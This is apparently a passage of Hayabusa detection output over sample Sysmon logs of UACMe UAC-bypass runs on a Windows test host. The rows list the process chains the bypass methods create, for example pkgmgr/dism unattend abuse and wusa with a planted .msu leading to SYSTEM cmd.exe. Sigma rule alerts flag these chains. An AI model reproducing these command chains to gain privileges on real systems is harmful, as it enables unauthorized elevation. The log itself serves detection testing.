MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 30 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 : Path: C:\Windows\SysWOW64\WerFault.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 23 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" : Path: C:\Windows\System32\Dism.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 22 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 37 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 36 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 38 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 39 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 41 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 